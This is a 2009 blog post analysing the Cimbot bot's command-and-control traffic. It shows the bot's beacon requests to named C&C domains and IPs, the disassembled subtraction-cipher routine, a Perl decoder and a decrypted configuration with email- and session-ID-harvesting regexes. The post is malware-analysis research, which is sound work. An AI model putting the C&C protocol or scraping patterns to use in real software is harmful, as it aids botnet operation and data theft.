« Bad Actors Part 6 - Eurohost LLC (aka UralNet?) | Main | A new method to monetize scareware »

2009.03.16

Cimbot - A technical analysis

Personal Exposition

I was recently sent a .pcap file of a bot's C&C communications. Every 182 seconds, the bot would download a GIF file from vazasaki-ji.info (91.211.65.180 as of Mar 11, 2009). These GIF files however are not well-formed — that is to say, it's a GIF89a header, followed by a lot of random gibberish.

At last! Something interesting and clever (this will make a good blog post). I've been wondering why it took so long for the bot authors to try to hide their communications steganographically (albeit poorly in this case).

At first I didn't have a sample of this bot, only its communications. Just eyeballing a hexdump of the data revealed some very strong patterns. It was safe to assume that this was a home-brew enciphering routine; I speculated that it was just a sixteen (or some multiple of sixteen) byte pattern, repeatedly XOR'd over the plaintext. Performing some statistical analysis of every nth byte of the cyphertext (for n = 1 .. 16) showed some very strong language-like patterns. There were only about 80 to 90 distinct bytes per nth column of cyphertext, about what you'd expect for printable ASCII, And there was a slight power-law distribution of those bytes, rather than a high-entropy flat distribution that a good encryption algorithm would produce.

Most home-brew cryptosystems like this are trivial to crack, so I started on a cyphertext-only cryptanalysis, and got pretty far along, until I received a Cimbot sample from Joe Stewart [SecureWorks]. And then I could cheat by just analyzing the binary code of the bot itself.

The Technical Part

Cimbot is written in Microsoft Visual C++. According to the PE headers of the sample I have now, it was compiled/linked on Tue Mar 25 04:31:15 2008 (but that's not always trustworthy). The bot sample I received communicates with sufujilisi.info (91.212.65.94 as of Mar 11, 2009), and does not use SSL — which I strongly suspect that more recent versions do. (As an aside: if anyone reading this has more Cimbot samples, please feel free to send them to me.)

This Cimbot sample is a module out of a larger malware system, which is the part which actually starts-up on boot, then loads Cimbot (stored encrypted on disk) into memory; Cimbot doesn't execute on its own. When executed Cimbot sets a pseudo-random registry key (which it frequently polls), and spawns a second thread (you know, all the usual stuff), it calls GetTickCount() in a loop, Sleep()ing for a second each time; it keeps checking if 60 seconds have passed; there are some calls to rand(). If the clock tick is above a certain value, it'll make an HTTP request to log-in to the C&C server. It's not really setting any state — just waiting — so if you're too ADHD to wait through all of this in a debugger, you can just flip the ZF bit when you get to that branch. (Or modify that jump instruction in the binary, the bot doesn't do any integrity checking.)

During initialization (before that loop I just mentioned) it calls GetVolumeInformationA() to get the VolumeSerialNumber of the System drive. It uses this value to generate an identity, which is used when initially logging into the C&C server… and… for decrypting (really deobfuscating) the encoded GIF data.

First Example

(Note that these examples have been scrubbed for anything which would reveal a victim's IP address or my own.)

The first thing the bot will send is this. The C63B220838F1 part is a unique identity for the bot, and also the crypto key.

GET /account/l.php?C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D
HTTP/1.1
Host: sufujilisi.info
Accept: */*
Connection: close

The C&C will send back something like this:

HTTP/1.1 200 OK
Date: Thu, 12 Mar 2009 01:43:05 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
X-Powered-By: PHP/5.1.4
Set-Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896; path=/
Content-Length: 0
Connection: close
Content-Type: text/html

The bot then uses that PHPSESSID Cookie for all further communications with the C&C.

The next thing that the bot will ask for is:

GET /account/d.php?data=7ef326c40791673eef9768c8921aaec4daf0 HTTP/1.1
Host: sufujilisi.info
Accept: */*
Connection: close
Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896

I kinda skimmed through the part where it calculates the 7ef136c49 stuff after the ?data= part. I can figure it out later if anyone cares. I've noticed that the two bytes (daf0 in this example) will change over time.

So, the C&C server send back something like this (with the fake-GIF hexified here, for your blogging pleasure):

HTTP/1.1 200 OK
Date: Thu, 12 Mar 2009 02:25:39 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
X-Powered-By: PHP/5.1.4
Content-Length: 2641
Connection: close
Content-Type: image/gif

00000000  47 49 46 38 39 61 03 b2  05 89 26 c2 5f 99 36 ca  |GIF89a....&._.6.|
00000010  48 26 12 38 f1 dc 0a 2a  09 e9 a3 17 c1 e4 87 e6  |H&.8...*........|
00000020  3b 22 08 38 f1 5b 0f 8a  09 e9 a3 58 c1 e8 87 c6  |;".8.[.....X....|
00000030  3b a2 f6 6e f1 5d 0f 8b  09 e9 a3 1a 04 e4 8b c6  |;..n.]..........|
00000040  3b 22 68 22 f1 1b 53 8a  0d e9 a3 17 e1 a3 89 c6  |;"h"..S.........|
00000050  3c 22 37 38 f1 1b 35 8a  38 51 15 7c 27 40 fa f0  |<"78..5.8Q.|'@..|
00000060  97 5f 64 ab 1b 43 6b ac  85 45 ca 40 00 0c b5 f0  |._d..Ck..E.@....|
00000070  7a 4b 63 94 22 77 4d e6  30 45 c5 74 f0 4d 89 ea  |zKc."wM.0E.t.M..|
00000080  6d 86 08 38 f1 1d 0f 15  09 e9 a3 93 c1 13 af 21  |m..8...........!|
00000090  9c 4f 82 68 1e 54 6b b7  66 64 d4 43 f4 14 04 ef  |.O.h.Tk.fd.C....|
000000a0  97 95 83 68 1d 50 8c b2  31 45 fe 45 3c 14 b3 f7  |...h.P..1E.E<...|
000000b0  6d 9f 64 95 1a 97 4f 06  31 45 ff 3c f5 14 b0 ef  |m.d...O.1E.<....|
000000c0  97 95 83 68 1d 50 8c b2  64 4a d0 91 f1 11 c0 22  |...h.P..dJ....."|
000000d0  68 7e 36 95 6c 4c 3b bd  39 66 cc 73 34 5f b7 f2  |h~6.lL;.9f.s4_..|
000000e0  70 9f 30 60 4d 76 3d 05  39 15 d4 49 3e 40 e4 ef  |p.0`Mv=.9..I>@..|
000000f0  b7 7e 36 61 4d 8e 8a ba  35 1e 20 3f 1c 45 b4 40  |.~6aM...5. ?.E.@|
00000100  98 9d 3a 64 25 98 38 b9  72 f1 c7 48 01 08 bc f4  |..:d%.8.r..H....|
00000110  5f 5a 6c 38 f1 1b 12 8a  20 e9 a3 17 d3 e4 b6 ee  |_Zl8.... .......|
00000120  ae 8b 6c 75 4c 7c 3c f0  39 16 dc 74 eb 0d b6 2f  |..luL|<.9..t.../|
00000130  3d 46 39 3b f1 36 0f 8a  09 ff a3 46 e9 57 ec 39  |=F9;.6.....F.W.9|
00000140  ae 8b 77 a6 2e 76 70 b7  6f 19 d0 50 1e 0e b0 f5  |..w..vp.o..P....|
00000150  a4 24 2c 69 f4 1b 26 8a  09 e9 b5 17 f0 0c ea 2f  |.$,i..&......../|
00000160  9f 5f 63 99 1e 81 3f b7  42 46 cd 40 f0 4d 89 ea  |._c...?.BF.@.M..|
00000170  6c 25 08 4d f1 1b 0f 9a  09 18 cb 8a fe 3f e8 f3  |l%.M.........?..|
00000180  a1 52 35 71 4e 45 38 b9  72 eb c7 48 c4 e4 96 c6  |.R5qNE8.r..H....|
00000190  3b 22 12 38 20 43 6b ad  37 13 cc 3b f0 4d 89 ea  |;".8 Ck.7..;.M..|
000001a0  6c 26 08 0b f1 1b 0f 5b  09 18 ff 45 e9 4b f0 2c  |l&.....[...E.K.,|
000001b0  64 9e 30 a2 61 82 38 06  31 59 11 7e ea 60 af 2d  |d.0.a.8.1Y.~.`.-|
000001c0  b5 4b 84 60 6b 84 7f b3  85 11 15 78 33 0d 03 ee  |.K.`k......x3...|
000001d0  a8 92 3b 61 6d 43 74 02  6e 12 1f 3f 2b 54 ec 2d  |..;amCt.n..?+T.-|
000001e0  64 9e 30 af 52 91 38 06  31 4a 15 81 ea 60 af 3a  |d.0.R.8.1J...`.:|
000001f0  9c 94 31 b4 19 8f 76 04  32 65 cb 78 24 49 b0 42  |..1...v.2e.x$I.B|
00000200  63 96 71 9e 1a 97 37 ec  76 59 cc 93 e9 45 fd 2f  |c.q...7.vY...E./|
00000210  64 9e 30 ac 52 8d 38 06  31 59 07 7d ea 60 af 28  |d.0.R.8.1Y.}.`.(|
00000220  b5 4b 84 60 53 95 41 b3  85 11 10 8a 2a 0d 03 ee  |.K.`S.A.....*...|
00000230  9e 83 6a 61 6d 43 73 f6  75 12 1f 3f 34 5d fa ef  |..jamCs.u..?4]..|
00000240  b7 4a 3b 9f 61 44 8b b2  7c 52 16 40 3d 0c fa 2f  |.J;.aD..|R.@=../|
00000250  ae 9a 31 b4 19 88 7f f1  32 65 cb 84 31 49 ee ef  |..1.....2e..1I..|
00000260  b7 4a 71 9b 60 44 8b b2  7c 60 09 40 3d 0c fe 33  |.Jq.`D..|`.@=..3|
00000270  b1 4b 84 60 68 88 70 b3  38 52 a7 17 dd e4 87 c6  |.K.`h.p.8R......|
00000280  55 22 37 60 5e 7c 78 f6  7d 58 dd 40 3d 0c f1 27  |U"7`^|x.}X.@=..'|
00000290  b1 83 7b 9b 63 84 7f fe  43 12 d2 80 c7 e4 8b c6  |..{.c...C.......|
000002a0  3b 22 48 45 f4 1b 16 8a  47 e9 a3 17 fe 31 f6 40  |;"HE....G....1.@|
000002b0  a4 8e 74 99 20 4f 3d ba  29 11 06 86 2e 54 e8 3a  |..t. O=.)....T.:|
000002c0  a4 84 74 9d 2c 3b 5c dd  52 2e c3 4d ef 14 c2 e6  |..t.,;\.R..M....|
000002d0  92 8b 76 9c 60 92 82 aa  57 3d c3 4c ef 15 c2 e6  |..v.`...W=.L....|
000002e0  8e 78 39 73 11 49 5d cf  5d 12 aa 17 0c e4 87 c6  |.x9s.I].].......|
000002f0  85 6f 77 b2 5a 87 7b eb  38 1d d1 47 e1 0c ea 35  |.ow.Z.{.8..G...5|
00000300  a8 92 69 ac 5a 7d 7b ef  44 09 f0 6a 0a 29 a7 fc  |..i.Z}{.D..j.)..|
00000310  69 52 43 58 48 84 7d ee  78 60 16 37 0f 38 a7 fb  |iRCXH.}.x`.7.8..|
00000320  69 53 43 58 44 71 40 c5  29 17 f1 5c 15 04 ca 12  |iSCXDq@.)..\....|
00000330  8d 42 39 66 22 49 43 bd  3b 1b cc 1e c1 3f 87 c6  |.B9f"IC.;....?..|
00000340  3b 7c 55 a7 6b 84 7b f6  6a 18 d8 45 f1 04 af 1d  |;|U.k.{.j..E....|
00000350  a4 90 6c a7 68 8e 4a aa  5e 24 c3 6e 2a 52 eb 35  |..l.h.J.^$.n*R.5|
00000360  b2 95 28 86 45 3b 44 b8  3a 24 c3 7c 2f 11 dc 19  |..(.E;D.:$.|/...|
00000370  76 42 7a ae 2b 4c 3d c2  37 19 d1 4e ea 04 ce 2b  |vBz.+L=.7..N...+|
00000380  9e 8d 77 67 23 4b 3f c0  39 22 d3 50 e1 2a f0 38  |..wg#K?.9".P.*.8|
00000390  a0 88 77 b0 20 4c 3d bf  37 19 d1 4e c8 e4 e6 c6  |..w. L=.7..N....|
000003a0  3b 22 66 85 60 95 78 f6  75 4a d2 4b ef 14 a7 ee  |;"f.`.x.uJ.K....|
000003b0  9e 91 75 a8 52 8f 78 ec  75 4e de 37 0e 37 d0 0b  |..u.R.x.uN.7.7..|
000003c0  5b 58 36 68 2c 3b 66 f3  77 4d 12 8e 34 04 d5 1a  |[X6h,;f.wM..4...|
000003d0  5b 57 36 69 2c 3b 62 e0  3a 24 c3 45 0f 29 db e6  |[W6i,;b.:$.E.)..|
000003e0  7e 6e 5a 58 22 49 40 b8  3d 1c d5 49 fc 04 b5 14  |~nZX"I@.=..I....|
000003f0  80 76 28 7b 3d 6d 2f bc  37 19 d1 4c f1 1b b9 fd  |.v({=m/.7..L....|
00000400  64 29 08 6b f1 1b 0f bc  56 58 1d 80 2d 50 e8 f5  |d).k....VX..-P..|
00000410  6f 50 38 58 19 7e 7e f7  79 4a 17 80 23 50 ec 01  |oP8X.~~.yJ..#P..|
00000420  5b 6f 5b 81 36 3b 45 b8  39 24 c3 6e 2a 52 eb 35  |[o[.6;E.9$.n*R.5|
00000430  b2 95 28 86 45 3b 44 b8  3a 12 aa 17 18 e4 87 c6  |..(.E;D.:.......|
00000440  91 6f 77 b2 5a 87 7b eb  38 1d d1 47 e1 0c ea 35  |.ow.Z.{.8..G...5|
00000450  a8 92 69 ac 5a 7d 7b ef  44 09 f0 6a 0a 29 a7 fc  |..i.Z}{.D..j.)..|
00000460  69 52 43 58 48 84 7d ee  78 60 16 37 0f 38 a7 fb  |iRCXH.}.x`.7.8..|
00000470  69 53 43 58 44 71 40 c5  29 17 f1 5c 15 04 ca 12  |iSCXDq@.)..\....|
00000480  8d 42 39 66 22 49 43 bd  3b 1b de 37 0a 52 ed 35  |.B9f"IC.;..7.R.5|
00000490  8b 83 7c a0 1f 4c 38 92  09 ec a3 17 c1 e6 ec 34  |..|..L8........4|
000004a0  44 22 25 38 f1 1b 2a 8a  5b 4e 09 7c 33 49 f9 00  |D"%8..*.[N.|3I..|
000004b0  5b 8a 7c ac 61 55 3e b9  75 4e 11 8c 38 12 ea 35  |[.|.aU>.uN..8..5|
000004c0  a8 2f 12 41 f1 36 0f 8a  09 02 a3 69 26 4a ec 38  |./.A.6.....i&J.8|
000004d0  a0 94 42 58 59 8f 83 fa  43 18 d2 7b 26 5a e8 3d  |..BXY...C..{&Z.=|
000004e0  69 85 77 a5 fa 1b 2a 8a  09 e9 bc 17 13 49 ed 2b  |i.w...*......I.+|
000004f0  ad 87 7a 72 11 83 83 fe  79 23 d2 46 25 49 fd 27  |..zr....y#.F%I.'|
00000500  b2 50 6b a7 5e 24 0f a5  09 e9 a3 30 c1 36 ec 2c  |.Pk.^$.....0.6.,|
00000510  a0 94 6d aa 2b 3b 77 fe  7d 59 dd 46 f0 48 ec 3c  |..m.+;w.}Y.F.H.<|
00000520  9c 99 36 9b 60 88 18 8a  24 e9 a3 17 da e4 d9 2b  |..6.`...$......+|
00000530  a1 87 7a 9d 63 55 2f f2  7d 5d 13 51 f0 13 f3 2b  |..z.cU/.}].Q...+|
00000540  a9 97 7f 66 54 8a 7c 93  09 04 a3 17 c1 fd 87 18  |...fT.|.........|
00000550  a0 88 6d aa 56 8d 49 aa  71 5d 17 87 fb 13 b6 32  |..m.V.I.q].....2|
00000560  a0 90 7d af 1f 7e 7e f7  12 e9 a5 17 c1 e4 87 c6  |..}..~~.........|
00000570  44 22 0a 38 f1 1b 0f 8a  12 e9 a5 17 c1 e4 87 c6  |D".8............|
*
00000860  45 22 0c 38 f1 1b 8f a4  0f e9 ae 17 c2 e4 87 c6  |E".8............|
00000870  3c 2e 08 39 f1 1b 0f 8b  15 ea a4 17 c1 e4 88 d2  |<..9............|
00000880  3d 23 08 38 f1 1d 1b 8d  0a e9 a3 17 c5 f0 8b c7  |=#.8............|
00000890  3b 22 08 3b fd 20 10 8a  09 e9 a8 23 c7 e5 87 c6  |;".;. .....#....|
000008a0  3b 27 14 3f f2 1b 0f 8a  0e f5 ab 18 c1 e4 87 cb  |;'.?............|
000008b0  47 2b 09 38 f1 1b 14 97  09 ea a3 17 c1 e5 95 c6  |G+.8............|
000008c0  3f 22 08 38 41 de 0f 8a  18 e9 a4 17 c1 e4 88 d7  |?".8A...........|
000008d0  3b 4a 08 38 f1 41 0f b9  67 11 fe 78 ee 5e b7 f3  |;J.8.A..g..x.^..|
000008e0  74 7e 35 95 6c 4c 3b bc  3d 66 cc 73 ef 0c e2 27  |t~5.lL;.=f.s...'|
000008f0  68 9c 64 66 4e 96 41 b6  40 66 cc 3b f0 f5 87 02  |h.dfN.A.@f.;....|
00000900  3b 22 08 72 f1 4a 6d b2  64 4a d0 91 f1 11 c0 22  |;".r.Jm.dJ....."|
00000910  69 7f 83 69 1d 4e 3f 07  32 45 d1 3f 1c 45 b4 40  |i..i.N?.2E.?.E.@|
00000920  6b 4f 41 94 1e 78 8a bb  35 1b d7 94 ea 40 b5 ee  |kOA..x..5....@..|
00000930  96 83 35 b2 4d 49 6c 05  3b 15 da 94 ea 08 b6 d8  |..5.MIl.;.......|
00000940  3b 69 08 38 f1 60 0f b9  31 4a 05 8c 34 49 b0 42  |;i.8.`..1J..4I.B|
00000950  63 83 6c a5 5a 89 38 06  31 60 08 79 2e 45 fa 3a  |c.l.Z.8.1`.y.E.:|
00000960  a0 94 31 b4 19 8b 7e fd  7d 56 04 8a 35 49 f9 ef  |..1...~.}V..5I..|
00000970  b7 4a 70 9d 5d 8b 38 06  31 51 12 8a 35 51 e8 39  |.Jp.].8.1Q..5Q.9|
00000980  af 87 7a 61 6d 43 82 fa  6a 56 cc 46 d4 e4 8b c6  |..zamC..jV.F....|
00000990  3b 22 90 4b f2 1b 30 8a  0a e9 a3 17 c2 05 88 c7  |;".K..0.........|
000009a0  3b 22 08 39 12 1d 10 8a  09 e9 a5 38 c4 e5 87 c6  |;".9.......8....|
000009b0  3b 40 29 3c f2 1b 0f 8a  0f 0a a8 18 c1 e4 87 cd  |;@)<............|
000009c0  5c 28 09 38 f1 1b 17 ab  10 ea a3 17 c1 ed a8 ce  |\(.8............|
000009d0  3c 22 08 38 fb 3c 18 8b  09 e9 a3 26 e3 e4 8c c6  |<".8.<.....&....|
000009e0  3b 22 0c 5d 3e 61 34 ad  09 ea a3 17 c1 e5 ab c6  |;".]>a4.........|
000009f0  40 22 08 38 f5 40 57 d8  2e 0e a3 19 c1 e4 87 2a  |@".8.@W........*|
00000a00  3b 48 08 3c f1 1b 0f ba  7e e9 a3 3e c1 ec 87 c6  |;H.<....~..>....|
00000a10  3b 02 9b 3c f1 bb ca 97  09 f8 c5 17 c1 e4 a3 c6  |;..<............|
00000a20  60 74 49 86 35 7a 5b e9  3d 48 db 3c ef xx xx xx  |`tI.5z[.=H.<.   |
00000a30  xx xx xx xx xx xx xx xx  xx xx xx xx xx xx xx xx  |                |Redacted
00000a40  45 23 08 38 f1 1e 2f 90  09 e9 a3 72 95 25 e5 81  |E#.8../....r.%..|
00000a50  3c                                                |<|
00000a51

(You see what I mean about the patterns mod sixteen. The high nibble of each byte will stay within a range of only one or two adjacent values. And some values repeat exactly from one column to the next.)

The Decoding Operation

[Drum Roll] So, this is the decryption routine, yes, this really is all there is to it. It's just a subtraction operation.

; Attributes: bp-based frame

sub_403635      proc near                 ; CODE XREF: sub_403587+21↑p

key             = dword ptr  8
sixteen         = dword ptr  0Ch
cyphertext      = dword ptr  10h
text_length     = dword ptr  14h
index           = esi

                push    ebp
                mov     ebp, esp
                push    index
                xor     index, index
                cmp     [ebp+text_length], index ; Test if passed a NULL
                jbe     short loc_40365B         ; if NULL pointer then return

decypher_loop:                            ; CODE XREF: sub_403635+24↓j
                mov     eax, [ebp+cyphertext]
                xor     edx, edx
                lea     ecx, [index+eax]  ; ECX points to current byte of the cypertext
                mov     eax, index
                div     [ebp+sixteen]     ; EDX is basically index&0x0F
                mov     eax, [ebp+key]
                mov     al, [edx+eax]     ; AL is the byte of the 'key'
                sub     [ecx], al         ; The decryption function itself.
                inc     index
                cmp     index, [ebp+text_length]
                jb      short decypher_loop

loc_40365B:                               ; CODE XREF: sub_403635+9↑j
                pop     index
                pop     ebp
                retn    10h
sub_403635      endp

It's called like this… The pointer to the GIF89a buffer is moved up by 15 bytes (and the length adjusted accordingly) So those bytes are not decrypted, then it uses the first 10h (16.0) bytes of the C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D (non-hex in memory) string as the subtraction key.

sub_403587      proc near                  ; CODE XREF: sub_401717+6C6↑p
                                           ; sub_40201F+13C↑p

arg_0           = dword ptr  4

                mov     edx, [esp+arg_0]
                mov     eax, [edx]
                cmp     eax, 0Fh           ; Test that GIF is at least 16 bytes
                jnb     short long_enough
                xor     eax, eax
                jmp     short locret_4035B0

long_enough:                               ; CODE XREF: sub_403587+9↑j
                add     eax, 0FFFFFFF1h
                push    eax                ; Length of (*GIF89a-15)
                mov     eax, [edx+4]
                add     eax, 0Fh
                push    eax                ; 15 bytes from the start of GIF89a
                push    10h                ; First sixteen bytes of...
                push    offset the_bot_id  ; The bot ID/key
                call    sub_403635
                push    1
                pop     eax

locret_4035B0:                             ; CODE XREF: sub_403587+D↑j
                retn    4
sub_403587      endp

So the following quickly written Perl script should decrypt this particular (so-called) GIF file:

#!/usr/bin/perl

use strict;
use IO::File;

my @key = ( 0xC6, 0x3B, 0x22, 0x08, 0x38, 0xf1, 0x1b, 0x0f, 
            0x8a, 0x09, 0xe9, 0xa3, 0x17, 0xc1, 0xe4, 0x87);

# If you're too lazy to retype the bot's login string as a byte array, 
# you can do something like this.
# my @key = split(//,pack("H32", 
#         "C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D"));
# map {$_ = ord} @key;

# You see, it's equivalent:
# print "( ",join(", ", @key)," );\n";

# You don't have to read all of the input file into memory either, 
# I'm just being lazy.
my $file = shift;
my $length = (stat($file))[7];
my $everything;
open(MOO, $file);
read(MOO, $everything, $length);
close(MOO);

my @bytes =  unpack("C*",$everything) ;
my $keylen = $#key;

my $offset=15;

# Do nothing for the first fifteen bytes.
for(my $i=0; $i<$offset; ) {
   print pack("C", $bytes[$i++] );
}

# Then start subtracting.
for(my $i=$offset; $i<$length; ) {
   print pack("C", $bytes[$i++] - $key[$i%16]); # Sooper-dooper encryption!
}

0; # The end

This is the result (hexified here for blogging purposes). It's much more legible now...

00000000  47 49 46 38 39 61 03 b2  05 89 26 c2 5f 99 36 04  |GIF89a....&._.6.|
00000010  0d 04 0a 00 00 c1 fb a0  00 00 00 00 00 00 00 20  |............... |
00000020  00 00 00 00 00 40 00 00  00 00 00 41 00 04 00 00  |.....@.....A....|
00000030  00 80 ee 36 00 42 00 01  00 00 00 03 43 00 04 00  |...6.B......C...|
00000040  00 00 60 ea 00 00 44 00  04 00 00 00 20 bf 02 00  |..`...D..... ...|
00000050  01 00 2f 00 00 00 26 00  2f 68 72 65 66 5c 73 2a  |../...&./href\s*|
00000060  5c 3d 5c 73 2a 28 5c 22  7c 5c 27 29 3f 28 2e 2a  |\=\s*(\"|\')?(.*|
00000070  3f 29 5b 5c 31 5c 3e 5c  27 5c 22 5d 2f 69 02 24  |?)[\1\>\'\"]/i.$|
00000080  32 64 00 00 00 02 00 8b  00 00 00 7c 00 2f 28 5b  |2d.........|./([|
00000090  61 2d 7a 30 2d 39 5c 2d  5d 7b 31 2c 33 30 7d 29  |a-z0-9\-]{1,30})|
000000a0  5c 73 7b 30 2c 35 7d 28  28 5c 5b 2e 7b 30 2c 31  |\s{0,5}((\[.{0,1|
000000b0  32 7d 5c 5d 29 7c 40 7c  28 5c 5c 25 34 30 29 29  |2}\])|@|(\\%40))|
000000c0  5c 73 7b 30 2c 35 7d 28  5b 61 2d 7a 30 2d 39 5c  |\s{0,5}([a-z0-9\|
000000d0  2d 5c 2e 5d 7b 31 2c 33  30 7d 29 5c 73 7b 30 2c  |-\.]{1,30})\s{0,|
000000e0  35 7d 28 28 5c 5b 2e 7b  30 2c 31 32 7d 5c 5d 29  |5}((\[.{0,12}\])|
000000f0  7c 5c 2e 29 5c 73 7b 30  2c 35 7d 28 5b 61 2d 7a  ||\.)\s{0,5}([a-z|
00000100  5d 7b 32 2c 34 7d 29 2f  69 08 24 31 40 24 35 2e  |]{2,4})/i.$1@$5.|
00000110  24 38 64 00 00 00 03 00  17 00 00 00 12 00 2f 28  |$8d.........../(|
00000120  73 69 64 3d 5b 61 2d 66  30 2d 39 5d 2a 29 2f 69  |sid=[a-f0-9]*)/i|
00000130  02 24 31 03 00 1b 00 00  00 16 00 2f 28 73 65 73  |.$1......../(ses|
00000140  73 69 6f 6e 3d 5b 61 2d  66 30 2d 39 5d 2a 29 2f  |sion=[a-f0-9]*)/|
00000150  69 02 24 31 03 00 17 00  00 00 12 00 2f 28 63 69  |i.$1......../(ci|
00000160  64 3d 5b 61 2d 66 30 2d  39 5d 2a 29 2f 69 02 24  |d=[a-f0-9]*)/i.$|
00000170  31 03 00 15 00 00 00 10  00 2f 28 73 3d 5b 61 2d  |1......../(s=[a-|
00000180  66 30 2d 39 5d 2a 29 2f  69 02 24 31 03 00 0f 00  |f0-9]*)/i.$1....|
00000190  00 00 0a 00 2f 28 5c 23  2e 2a 29 24 2f 69 02 24  |..../(\#.*)$/i.$|
000001a0  31 04 00 d3 00 00 00 d1  00 2f 5c 2e 28 67 69 66  |1......../\.(gif|
000001b0  29 7c 28 6a 70 67 29 7c  28 70 6e 67 29 7c 28 67  |)|(jpg)|(png)|(g|
000001c0  7a 29 7c 28 7a 69 70 29  7c 28 72 61 72 29 7c 28  |z)|(zip)|(rar)|(|
000001d0  6d 70 33 29 7c 28 65 78  65 29 7c 28 6a 70 65 67  |mp3)|(exe)|(jpeg|
000001e0  29 7c 28 77 61 76 29 7c  28 61 72 6a 29 7c 28 74  |)|(wav)|(arj)|(t|
000001f0  61 72 29 7c 28 74 67 7a  29 7c 28 61 63 65 29 7c  |ar)|(tgz)|(ace)||
00000200  28 74 69 66 29 7c 28 62  6d 70 29 7c 28 61 76 69  |(tif)|(bmp)|(avi|
00000210  29 7c 28 74 61 72 29 7c  28 70 64 66 29 7c 28 62  |)|(tar)|(pdf)|(b|
00000220  7a 29 7c 28 62 7a 32 29  7c 28 6d 73 69 29 7c 28  |z)|(bz2)|(msi)|(|
00000230  63 61 62 29 7c 28 64 6c  6c 29 7c 28 73 79 73 29  |cab)|(dll)|(sys)|
00000240  7c 28 33 67 70 29 7c 28  73 69 73 29 7c 28 73 69  ||(3gp)|(sis)|(si|
00000250  73 78 29 7c 28 6d 70 67  29 7c 28 6d 70 65 67 29  |sx)|(mpg)|(mpeg)|
00000260  7c 28 69 63 6f 29 7c 28  73 77 66 29 7c 28 77 6d  ||(ico)|(swf)|(wm|
00000270  76 29 7c 28 77 6d 61 29  2f 69 04 00 1c 00 00 00  |v)|(wma)/i......|
00000280  1a 00 2f 28 6d 61 69 6c  74 6f 3a 29 7c 28 6a 61  |../(mailto:)|(ja|
00000290  76 61 73 63 72 69 70 74  3a 29 2f 69 06 00 04 00  |vascript:)/i....|
000002a0  00 00 40 0d 03 00 07 00  3e 00 00 00 3d 4d 6f 7a  |..@.....>...=Moz|
000002b0  69 6c 6c 61 2f 34 2e 30  20 28 63 6f 6d 70 61 74  |illa/4.0 (compat|
000002c0  69 62 6c 65 3b 20 4d 53  49 45 20 36 2e 30 3b 20  |ible; MSIE 6.0; |
000002d0  57 69 6e 64 6f 77 73 20  4e 54 20 35 2e 31 3b 20  |Windows NT 5.1; |
000002e0  53 56 31 3b 20 2e 4e 45  54 29 07 00 4b 00 00 00  |SV1; .NET)..K...|
000002f0  4a 4d 6f 7a 69 6c 6c 61  2f 34 2e 30 20 28 63 6f  |JMozilla/4.0 (co|
00000300  6d 70 61 74 69 62 6c 65  3b 20 4d 53 49 45 20 36  |mpatible; MSIE 6|
00000310  2e 30 3b 20 57 69 6e 64  6f 77 73 20 4e 54 20 35  |.0; Windows NT 5|
00000320  2e 31 3b 20 53 56 31 3b  20 2e 4e 45 54 20 43 4c  |.1; SV1; .NET CL|
00000330  52 20 31 2e 31 2e 34 33  32 32 29 07 00 5b 00 00  |R 1.1.4322)..[..|
00000340  00 5a 4d 6f 7a 69 6c 6c  61 2f 35 2e 30 20 28 57  |.ZMozilla/5.0 (W|
00000350  69 6e 64 6f 77 73 3b 20  55 3b 20 57 69 6e 64 6f  |indows; U; Windo|
00000360  77 73 20 4e 54 20 35 2e  31 3b 20 65 6e 2d 55 53  |ws NT 5.1; en-US|
00000370  3b 20 72 76 3a 31 2e 38  2e 30 2e 37 29 20 47 65  |; rv:1.8.0.7) Ge|
00000380  63 6b 6f 2f 32 30 30 36  30 39 30 39 20 46 69 72  |cko/20060909 Fir|
00000390  65 66 6f 78 2f 31 2e 35  2e 30 2e 37 07 00 5f 00  |efox/1.5.0.7.._.|
000003a0  00 00 5e 4d 6f 7a 69 6c  6c 61 2f 34 2e 30 20 28  |..^Mozilla/4.0 (|
000003b0  63 6f 6d 70 61 74 69 62  6c 65 3b 20 4d 53 49 45  |compatible; MSIE|
000003c0  20 36 2e 30 3b 20 57 69  6e 64 6f 77 73 20 4e 54  | 6.0; Windows NT|
000003d0  20 35 2e 31 3b 20 53 56  31 3b 20 2e 4e 45 54 20  | 5.1; SV1; .NET |
000003e0  43 4c 52 20 31 2e 31 2e  34 33 32 32 3b 20 2e 4e  |CLR 1.1.4322; .N|
000003f0  45 54 20 43 4c 52 20 32  2e 30 2e 35 30 37 32 37  |ET CLR 2.0.50727|
00000400  29 07 00 33 00 00 00 32  4d 6f 7a 69 6c 6c 61 2f  |)..3...2Mozilla/|
00000410  34 2e 30 20 28 63 6f 6d  70 61 74 69 62 6c 65 3b  |4.0 (compatible;|
00000420  20 4d 53 49 45 20 36 2e  30 3b 20 57 69 6e 64 6f  | MSIE 6.0; Windo|
00000430  77 73 20 4e 54 20 35 2e  31 29 07 00 57 00 00 00  |ws NT 5.1)..W...|
00000440  56 4d 6f 7a 69 6c 6c 61  2f 34 2e 30 20 28 63 6f  |VMozilla/4.0 (co|
00000450  6d 70 61 74 69 62 6c 65  3b 20 4d 53 49 45 20 36  |mpatible; MSIE 6|
00000460  2e 30 3b 20 57 69 6e 64  6f 77 73 20 4e 54 20 35  |.0; Windows NT 5|
00000470  2e 31 3b 20 53 56 31 3b  20 2e 4e 45 54 20 43 4c  |.1; SV1; .NET CL|
00000480  52 20 31 2e 31 2e 34 33  32 32 3b 20 49 6e 66 6f  |R 1.1.4322; Info|
00000490  50 61 74 68 2e 31 29 08  00 03 00 00 00 02 65 6e  |Path.1).......en|
000004a0  09 00 1d 00 00 00 1b 00  52 65 66 65 72 65 72 3a  |........Referer:|
000004b0  20 68 74 74 70 3a 2f 2f  6c 65 6e 75 77 2e 63 6f  | http://lenuw.co|
000004c0  6d 0d 0a 09 00 1b 00 00  00 19 00 52 65 66 65 72  |m..........Refer|
000004d0  65 72 3a 20 68 74 74 70  3a 2f 2f 64 65 76 61 77  |er: http://devaw|
000004e0  2e 63 6f 6d 09 00 1b 00  00 00 19 00 52 65 66 65  |.com........Refe|
000004f0  72 65 72 3a 20 68 74 74  70 3a 2f 2f 64 65 76 61  |rer: http://deva|
